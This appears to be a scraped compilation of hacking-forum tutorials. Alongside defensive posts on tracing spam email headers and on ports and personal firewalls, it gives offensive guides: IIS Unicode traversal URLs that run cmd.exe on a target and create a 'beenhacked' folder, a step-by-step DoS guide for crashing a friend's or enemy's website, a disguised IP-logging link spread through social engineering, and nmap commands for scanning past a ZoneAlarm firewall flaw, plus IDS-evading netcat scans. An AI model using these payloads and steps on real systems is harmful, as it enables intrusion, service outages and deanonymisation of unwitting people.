How to scan a target for open ports and services using Netcat, SuperScan, Strobe

How to scan a target for open ports and services using Netcat, SuperScan, Strobe

Netcat: The netcat application has many uses; one is the ability to scan a target for open ports and services. Another utility, cryptcat, is almost identical except that it operates with encryption.

From a DOS prompt, type the following with the syntax of:

Other useful commands for Netcat

The –v option instructs netcat to run in verbose mode, allowing you to see the progress of the scan.

The –r option instructs netcat to randomize local and remote ports in an attempt to elude any intrusion detection systems.

The –w2 option instructs netcat to wait 2 seconds between each port scanned to help elude any intrusion detection systems.

The –z option instructs netcat to operate in a zero-I/O (Input/Output) mode. It is best to use the –z when scanning with netcat.

The 1-1024 instructs netcat to scan port 1-1024.

*Note: 7, 13, 17, 9, and 19 as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.

SuperScan: SuperScan has the ability to discover which ports are open on the target. Identifying the open ports tells an attacker what ports are available for potential exploit.

Accept the default installation of SuperScan. The installation will occur and the SuperScan application will start.

Strobe: The Strobe application identifies ports open on the target. By identifying the ports available this gives an attacker a potential hole to attempt to punch through and compromise the computer and/or network. Remember that all commands in Linux are case sensitive.

For the Windows-based version install and execute with the following syntax:

./strobe (Target IP)

From the Linux directory containing the compressed file type tar –zxvf strobe103.tar.gz. The files will uncompress into a new directory named strobe. Change to the new directory by typing cd strobe and pressing Enter. From the new directory type make install and press Enter.

To execute Strobe against the target in this example: ./strobe 172.16.1.40

The Strobe application will now execute against the target.

Read More

How to Identify CGI Vulnerabilities using TCS CGI Scanner

How to Identify CGI Vulnerabilities using TCS CGI Scanner

The TCS Common Gateway Interface (CGI) Scanner application is designed to find targets that have vulnerable CGI Script errors. These errors are normally due to systems that have not been patched or updated.

Click to highlight the default target of htpp://www.tpp.ru and click on the at the top left of the application to delete the current target.

On the gray bar along the top left of the application, enter the IP address or hostname of the target and click on the gray-colored arrow to insert the new target. Repeat this process for multiple targets. The TCS CGI Scanner is now ready to scan the target.

In this example, each script run against the target is displayed with the result to the right. The ones of interest are any with a 200 as this indicates a successful attempt.

To execute, right-click on a script and left-click on Copy String. Open Internet Explorer and paste the line in the address bar. Press the Enter key. The directory listing of the target’s C: drive will appear.

The line that should be in the address bar is:

http://172.16.1.40/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

To list the contents of the Program Files directory, edit the address bar to

http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1

Create directory command within the script:

http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked

Notice that the beenhacked directory is now created in the root of the C: drive on the target.

The gray bar along the top right of the application allows you to enter custom scripts for the application to check against the target. If you wanted to check the Program Files directory or create a beenhacked directory on each target it is capable of compromising, you could enter these scripts here and click the downward-pointing arrow to enter the script into the application. Repeat this process for multiple targets

Read More

IP Spoofing Attack

IP Spoofing Attack

Internet Protocol i.e IP addresses are unique and used for digital data communication for internet. Any mailing system or website technology works on the same principle of digital communication.

IP Spoofing

Every computer connected to Network have its unique IP address.
When Person A sends an email  to person B, The mail is assigned with the header which contains the IP’s of sender and Reciver so that mail can go to the same person B and not to some one else.
Now in a private network for security reasons limited mails are accpeted from reserved IP’s.
In Simple word only internal communication can be worked. Person from outside can’t send mail in that network.
So if attacker wants send the mail inside, He will spoof the IP.
He first will sniffs the data packets in the internal communication adn steal some internal email.
Then he will perform changing in header of the mail. he will change content of the mail and send this mail to network again.
System cant provide security against this because it have internal fake IP.
This is how fake IP  is created and attack of spoofing is done.

Read More

How To Crash Small Websites (NOOB FRIENDLY)

How To Crash Small Websites (NOOB FRIENDLY)

Ok so your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it .

TOOLS:
>>Port Scanner<<
>>rDos<<
>>HotSpotSheild Proxy!<<

Step One: First we need to find the websites IP Adress. This is very easy todo.

Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s)
EXAMPLE:


Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open
EXAMPLE:



Step Three ALMOST DONE:

The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!

Ok open Up rDos that you download.
Enter your victims ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn't connect!
EXAMPLE:


Thanks for reading i hope this helps :)

Read More

Easy way to trace a ip

Easy way to trace a ip

Ohk.. finally after learning a lot from HF finally i am contributing....

Most of you might be knowing this trick ...

but still World is full of ppl who dont know many things ..including this...

so without further Ado lets start..


use this link...

http://rpgcrime.com/send.swf?msg=themain...email=xxxx



where xxxxxx= ur email

now this link is quite obvious that it is for ip tracing ..

so to conceal it we will use link shortner

http://sturly.com

here you can get a new link for the same and you can name it anything like

pics ...

so the new link u will get will be like

http://sturly.com/pics

now use your social engg tricks to name links and make the person click them.

ip of the person will be sent instantaneously.

Read More

Backtracking EMAILs

Backtracking EMAILs

Tracking email back to its source: Twisted Evil

cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path: < s359dyxtt@yahoo.coms359dyxtt@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it >

X-Original-To: davar@example.comdavar@example.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it

Delivered-To: davar@example.comdavar@example.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])

by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7

for < davar@example.comdavar@example.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it >; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: -n@eo2.32574-n@eo2.32574This e-mail address is being protected from spam bots, you need JavaScript enabled to view it >

From: "Maricela Paulson" < s359dyxtt@yahoo.coms359dyxtt@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it >

Reply-To: "Maricela Paulson" < s359dyxtt@yahoo.coms359dyxtt@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it >

To: davar@example.comdavar@example.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com.s359dyxxt@yahoo.com.This e-mail address is being protected from spam bots, you need JavaScript enabled to view it I could just fire off a message to abuse@yahoo.comabuse@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it , but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)

12.0.0.0 - 12.255.255.255

Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)

12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15

# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost

Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com

Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.comabuse@mchsi.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

Read More

Open | Close Ports

Open | Close Ports

With the spread of Hackers and Hacking incidents, the time has come, when not only system administrators of servers of big companies, but also people who connect to the Internet by dialing up into their ISP, have to worry about securing their system. It really does not make much difference whether you have a static IP or a dynamic one, if your system is connected to the Internet, then there is every chance of it being attacked.

This manual is aimed at discussing methods of system security analysis and will shed light on as to how to secure your standalone (also a system connected to a LAN) system.

Open Ports: A Threat to Security?

In the Netstat Tutorial we had discussed how the netstat -a command showed the list of open ports on your system. Well, anyhow, before I move on, I would like to quickly recap the important part. So here goes, straight from the netstat tutorial:

Now, the ??a? option is used to display all open connections on the local machine. It also returns the remote system to which we are connected to, the port numbers of the remote system we are connected to (and the local machine) and also the type and state of connection we have with the remote system.

For Example,

C:\windows>netstat -a

Active Connections


 Proto  Local Address          Foreign Address              State
 TCP    ankit:1031             dwarf.box.sk:ftp                       ESTABLISHED
 TCP    ankit:1036             dwarf.box.sk:ftp-data                 TIME_WAIT
 TCP    ankit:1043             banners.egroups.com:80    FIN_WAIT_2
 TCP    ankit:1045             mail2.mtnl.net.in:pop3       TIME_WAIT
 TCP    ankit:1052             zztop.boxnetwork.net:80   ESTABLISHED
 TCP    ankit:1053             mail2.mtnl.net.in:pop3       TIME_WAIT
 UDP    ankit:1025             *:*
 UDP    ankit:nbdatagram       *:*


Now, let us take a single line from the above output and see what it stands for:

Proto  Local Address          Foreign Address              State
TCP    ankit:1031                dwarf.box.sk:ftp              ESTABLISHED

Now, the above can be arranged as below:

Protocol: TCP (This can be Transmission Control Protocol or TCP, User Datagram Protocol or UDP or sometimes even, IP or Internet Protocol.)

Local System Name: ankit (This is the name of the local system that you set during the Windows setup.)

Local Port opened and being used by this connection: 1031

Remote System: dwarf.box.sk (This is the non-numerical form of the system to which we are connected.)

Remote Port: ftp (This is the port number of the remote system dwarf.box.sk to which we are connected.)

State of Connection: ESTABLISHED

?Netstat? with the ??a? argument is normally used, to get a list of open ports on your own system i.e. on the local system. This can be particularly useful to check and see whether your system has a Trojan installed or not. Yes, most good Antiviral software are able to detect the presence of Trojans, but, we are hackers, and need to software to tell us, whether we are infected or not. Besides, it is more fun to do something manually than to simply click on the ?Scan? button and let some software do it.

The following is a list of Trojans and the port numbers which they use, if you Netstat yourself and find any of the following open, then you can be pretty sure, that you are infected.



Port 12345(TCP)                   Netbus
Port 31337(UDP)                 Back Orifice

For complete list, refer to the Tutorial on Trojans at: hackingtruths.box.sk/trojans.txt
----

Now, the above tutorial resulted in a number of people raising questions like: If the 'netstat -a' command shows open ports on my system, does this mean that anyone can connect to them? Or, How can I close these open ports? How do I know if an open port is a threat to my system's security of not? Well, the answer to all these question would be clear, once you read the below paragraph:

Now, the thing to understand here is that, Port numbers are divided into three ranges:

The Well Known Ports are those from 0 through 1023. This range or ports is bound to the services running on them. By this what I mean is that each port usually has a specific service running on it. You see there is an internationally accepted Port Numbers to Services rule, (refer RFC 1700 Here) which specifies as to on what port number a particular service runs. For Example, By Default or normally FTP runs on Port 21. So if you find that Port 21 is open on a particular system, then it usually means that that particular system uses the FTP Protocol to transfer files. However, please note that some smart system administrators delibrately i.e. to fool lamers run fake services on popular ports. For Example, a system might be running a fake FTP daemon on Port 21. Although you get the same interface like the FTP daemon banner, response numbers etc, however, it actually might be a software logging your prescence and sometimes even tracing you!!!

The Registered Ports are those from 1024 through 49151. This range of port numbers is not bound to any specific service. Actually, Networking utlites like your Browser, Email Client, FTP software opens a random port within this range and starts a communication with the remote server. A port number within this range is the reason why you are able to surf the net or check your email etc.

If you find that when you give the netstat -a command, then a number of ports within this range are open, then you should probably not worry. These ports are simply opened so that you can get your software applications to do what you want them to do. These ports are opened temporarily by various applications to perform tasks. They act as a buffer transfering packets (data) received to the application and vis-a-versa. Once you close the application, then you find that these ports are closed automatically. For Example, when you type www.hotmail.com in your browser, then your browser randomly chooses a Registered Port and uses it as a buffer to communicate with the various remote servers involved.

The Dynamic and/or Private Ports are those from 49152 through 65535. This range is rarely used, and is mostly used by trojans, however some application do tend to use such high range port numbers. For Example,Sun starts their RPC ports at 32768.
So this basically brings us to what to do if you find that Netstat gives you a couple of open ports on your system:

1. Check the Trojan Port List and check if the open port matches with any of the popular ones. If it does then get a trojan Removal and remove the trojan.

2. If it doesn't or if the Trojan Remover says: No trojan found, then see if the open port lies in the registered Ports range. If yes, then you have nothing to worry, so forget about it.

***********************
HACKING TRUTH: A common technique employed by a number of system administrators, is remapping ports. For example, normally the default port for HTTP is 80. However, the system administrator could also remap it to Port 8080. Now, if that is the case, then the homepage hosted at that server would be at:

http://domain.com:8080 instead of
http://domain.com:80

The idea behind Port Remapping is that instead of running a service on a well known port, where it can easily be exploited, it would be better to run it on a not so well known port, as the hacker, would find it more difficult to find that service. He would have to port scan high range of numbers to discover port remapping.

The ports used for remapping are usually pretty easy to remember. They are choosen keeping in mind the default port number at which the service being remapped should be running. For Example, POP by default runs on Port 110. However, if you were to remap it, you would choose any of the following: 1010, 11000, 1111 etc etc

Some sysadmins also like to choose Port numbers in the following manner: 1234,2345,3456,4567 and so on... Yet another reason as to why Port Remapping is done, is that on a Unix System to be able to listen to a port under 1024, you must have root previledges.
************************


Firewalls

Use of Firewalls is no longer confined to servers or websites or commerical companies. Even if you simply dial up into your ISP or use PPP (Point to Point Protocol) to surf the net, you simply cannot do without a firewall. So what exactly is a firewall?

Well, in non-geek language, a firewall is basically a shield which protects your system from the untrusted non-reliable systems connected to the Internet. It is a software which listens to all ports on your system for any attempts to open a connection and when it detects such an attempt, then it reacts according to the predefined set of rules. So basically, a firewall is something that protects the network(or systen) from the Internet. It is derived from the concept of firewalls used in vehicles which is a barrier made of fire resistant material protecting the vehicle in case of fire.

Now, for a better 'according to the bible' defination of a firewall: A firewall is best described as a software or hardware or both Hardware and Software packet filter that allows only selected packets to pass through from the Internet to your private internal network. A firewall is a system or a group of systems which guard a trusted network( The Internal Private Network from the untrusted network (The Internet.)

NOTE: This was a very brief desciption of what a firewall is, I would not be going into the details of their working in this manual.

Anyway,the term 'Firewalls', (which were generally used by companies for commerical purposes) has evolved into a new term called 'Personal Firewalls'. Now this term is basically used to refer to firewalls installed on a standalone system which may or may not be networked i.e. It usually connects to an ISP. Or in other words a personal firewall is a firewall used for personal use.

Now that you have a basic desciption as to what a firewall is, let us move on to why exactly you need to install a Firewall? Or, how can not installing a firewall pose a threat to the security of your system?

You see, when you are connected to the Internet, then you have millions of other untrusted systems connected to it as well. If somehow someone found out your IP address, then they could do probably anything to your system. They could exploit any vulnerability existing in your system, damage your data, and even use your system to hack into other computers.

Finding out someone'e IP Address is not very difficult. Anybody can find out your IP, through various Chat Services, Instant Messengers (ICQ, MSN, AOL etc), through a common ISP and numerous other ways. Infact finding out the IP Address of a specific person is not always the priority of some hackers.

What I mean to say by that is that there are a number of Scripts and utilities available which scan all IP addresses between a certain range for predefined common vulnerabilities. For Example, Systems with File Sharing Enabled or a system running an OS which is vulnerable to the Ping of Death attack etc etc As soon as a vulnerable system is found, then they use the IP to carry out the attacks.

The most common scanners look for systems with RAT's or Remote Administration Tools installed. They send a packet to common Trojan ports and display whether the victim's system has that Trojan installed or not. The 'Scan Range of IP Addresses' that these programs accept are quite wide and one can easily find a vulnerable system in the matter of minutes or even seconds.

Trojan Horses like Back Orifice provide remote access to your system and can set up a password sniffer. The combination of a back door and a sniffer is a dangerous one: The back door provides future remote access, while the sniffer may reveal important information about you like your other Passwords, Bank Details, Credit Card Numbers, Social Security Number etc If your home system is connected to a local LAN and the attacker manages to install a backdoor on it, then you probably have given the attacker the same access level to your internal network, as you have. This wouls also mean that you will have created a back door into your network that bypasses any firewall that may be guarding the front door.

You may argue with me that as you are using a dial up link to your ISP via PPP, the attacker would be able to access your machine only when you are online. Well, yes that is true, however, not completely true. Yes, it does make access to your system when you reconnect, difficult, as you have a dynamic Internet Protocol Address. But, although this provides a faint hope of protection, routine scanning of the range of IP's in which your IP lies, will more often than not reveal your current Dynamic IP and the back door will provide access to your system.

*******************
HACKING TRUTH: Microsoft Says: War Dialer programs automatically scan for modems by trying every phone number within an exchange. If the modem can only be used for dial-out connections, a War Dialer won't discover it. However, PPP changes the equation, as it provides bidirectional transportmaking any connected system visible to scanners?and attackers.
*******************

So how do I protect myself from such Scans and unsolicitated attacks? Well, this is where Personal Firewalls come in. They just like their name suggests, protect you from unsolicitated connection probes, scans, attacks.

They listen to all ports for any connection requests received (from both legitimate and fake hosts) and sent (by applications like Browser, Email Client etc.) As soon as such an instance is recorded, it pops up a warning asking you what to do or whether to allow the connection to initiate or not. This warning message also contains the IP which is trying to initiate the connection and also the Port Number to which it is trying to connect i.e. the Port to which the packet was sent. It also protects your system from Port Scans, DOS Attacks, Vulnerability attacks etc. So basically it acts as a shield or a buffer which does not allow your system to communicate with the untrusted systems directly.

Most Personal Firewalls have extensive logging facilities which allows you to track down the attackers. Some popular firewalls are:

1.BlackICE Defender : An IDS for PC's. It's available at http://www.networkice.com.

2. ZoneAlarm: The easiest to setup and manage firewall. Get it for free at: www.zonelabs.com

Once you have installed a firewall on your system, you will often get a number of Warnings which might seem to be as if someone is trying to break into your system, however, they are actually bogus messages, which are caused by either your OS itself or due to the process called Allocation of Dynamic IP's. For a details description of these two, read on.

Many people complain that as soon as they dial into their ISP, their firewall says that such and such IP is probing Port X. What causes them?
Well, this is quite common. The cause is that somebody hung up just before you dialed in and your ISP assigned you the same IP address. You are now seeing the remains of communication with the previous person. This is most common when the person to which the IP was assigned earlier was using ICQ or chat programs, was connected to a Game Server or simply turned off his modem before his communication with remote servers was complete.

You might even get a message like: Such and Such IP is trying to initaite a Netbios Session on Port X. This again is extrememly common. The following is an explanation as to why it happens, which I picked up a couple of days ago: NetBIOS requests to UDP port 137 are the most common item you will see in your firewall reject logs. This comes about from a feature in Microsoft's Windows: when a program resolves an IP address into a name, it may send a NetBIOS query to IP address. This is part of the background radiation of the Internet, and is nothing to be concerned about.

What Causes them? On virtually all systems (UNIX, Macintosh, Windows), programs call the function 'gethostbyaddr()' with the desired address. This function will then do the appropriate lookup, and return the name. This function is part of the sockets API. The key thing to remember about gethostbyaddr() is that it is virtual. It doesn't specify how it resolves an address into a name. In practice, it will use all available mechanisms. If we look at UNIX, Windows, and Macintosh systems, we see the following techniques:

DNS in-addr.arpa PTR queries sent to the DNS server
NetBIOS NodeStatus queries sent to the IP address
lookups in the /etc/hosts file
AppleTalk over IP name query sent to the IP address
RPC query sent to the UNIX NIS server
NetBIOS lookup sent to the WINS server

Windows systems do the /etc/hosts, DNS, WINS, and NodeStatus techniques. In more excruciating detail, Microsoft has a generic system component called a naming service. All the protocol stacks in the system (NetBIOS, TCP/IP, Novel IPX, AppleTalk, Banyan, etc.) register the kinds of name resolutions they can perform. Some RPC products will likewise register an NIS naming service. When a program requests to resolve an address, this address gets passed onto the generic naming service. Windows will try each registered name resolution subsystem sequentially until it gets an answer.

(Side note: User's sometimes complained that accessing Windows servers is slow. This is caused by installing unneeded protocol stacks that must timeout first before the real protocol stack is queried for the server name.).

The order in which it performs these resolution steps for IP addresses can be configured under the Windows registry key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider.

Breaking Through Firewalls

Although Firewalls are meant to provide your complete protection from Port Scan probes etc there are several holes existing in popular firewalls, waiting to be exploited. In this issue, I will discuss a hole in ZoneAlarm Version 2.1.10 to 2.0.26, which allows the attacker to port scan the target system (Although normally it should stop such scans.)

If one uses port 67 as the source port of a TCP or UDP scan, ZoneAlarm will let the packet through and will not notify the user. This means, that one can TCP or UDP port scan a ZoneAlarm protected computer as if there were no firewall there IF one uses port 67 as the source port on the packets.

Exploit:
UDP Scan:
You can use NMap to port scan the host with the following command line:

nmap -g67 -P0 -p130-140 -sU 192.168.128.88

(Notice the -g67 which specifies source port).

TCP Scan:
You can use NMap to port scan the host with the following command line:

nmap -g67 -P0 -p130-140 -sS 192.168.128.88

(Notice the -g67 which specifies source port).

Read More